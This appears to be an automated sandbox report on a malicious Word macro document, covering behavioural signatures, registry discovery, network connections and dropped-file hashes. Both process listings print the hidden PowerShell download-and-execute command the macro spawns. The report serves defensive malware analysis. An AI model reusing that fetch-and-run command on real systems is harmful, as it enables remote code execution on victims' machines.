Malware Analysis Report

2025-08-10 15:07

Sample ID 241103-zzb8lsvfll
Target 9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315
SHA256 9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315
Tags
macro macro_on_action discovery execution
score
10/10


Analysis Overview

score
10/10

SHA256

9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315

Threat Level: Known bad

The file 9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action discovery execution

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Office macro that triggers on suspicious action

Suspicious Office macro

Drops file in Windows directory

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-03 21:08

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Suspicious Office macro

macro
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-03 21:08

Reported

2024-11-03 21:11

Platform

win7-20240903-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country | Destination | Domain | Proto
N/A | 127.0.0.1:8000 | | tcp

Files

memory/1696-0-0x000000002F521000-0x000000002F522000-memory.dmp

memory/1696-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1696-2-0x00000000717AD000-0x00000000717B8000-memory.dmp

memory/1696-10-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-7-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-6-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-5-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-4-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-15-0x0000000000370000-0x0000000000470000-memory.dmp

memory/1696-14-0x0000000000370000-0x0000000000470000-memory.dmp

memory/2704-18-0x00000000002F0000-0x00000000002F9000-memory.dmp

memory/1696-19-0x00000000717AD000-0x00000000717B8000-memory.dmp

memory/1696-20-0x0000000000370000-0x0000000000470000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-03 21:08

Reported

2024-11-03 21:11

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

143s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc" /o ""

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc" /o ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 90.160.77.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp
FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp
US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp
N/A | 127.0.0.1:8000 | | tcp
US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp
US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp
US | 95.100.195.47:443 | metadata.templates.cdn.office.net | tcp
US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp
US | 8.8.8.8:53 | 47.195.100.95.in-addr.arpa | udp
US | 8.8.8.8:53 | 74.12.20.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 74.209.201.84.in-addr.arpa | udp
US | 8.8.8.8:53 | 160.144.22.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp

Files

memory/620-1-0x00007FFE9042D000-0x00007FFE9042E000-memory.dmp

memory/620-0-0x00007FFE50410000-0x00007FFE50420000-memory.dmp

memory/620-2-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-6-0x00007FFE50410000-0x00007FFE50420000-memory.dmp

memory/620-5-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-7-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-8-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-4-0x00007FFE50410000-0x00007FFE50420000-memory.dmp

memory/620-9-0x00007FFE50410000-0x00007FFE50420000-memory.dmp

memory/620-10-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-3-0x00007FFE50410000-0x00007FFE50420000-memory.dmp

memory/620-11-0x00007FFE4DAB0000-0x00007FFE4DAC0000-memory.dmp

memory/620-13-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-15-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-17-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-19-0x00007FFE4DAB0000-0x00007FFE4DAC0000-memory.dmp

memory/620-18-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-16-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-14-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-12-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-31-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-30-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/1364-35-0x00000254E25E0000-0x00000254E2602000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbewux1h.jou.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

memory/620-55-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-56-0x00007FFE9042D000-0x00007FFE9042E000-memory.dmp

memory/620-57-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

memory/620-58-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 61b343870852ccc0e70c8d8c3bb4cc8c
SHA1 c0dcaee03722a93eab2fcfd618392bb33b5c84df
SHA256 3869ac37373af3706ac20ffa74d1de3a9bf15af52e7e9cb0a2374fca22cdc261
SHA512 1045cc8cf850a807ab9539e714cdeb7750b8da5751d40a634934845aec2094069a8a1c43c888c401424733b43c6d8227d2f7f478b9bdd79bf668ee3891f28b2f

memory/620-67-0x00007FFE90390000-0x00007FFE90585000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDEFB4.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810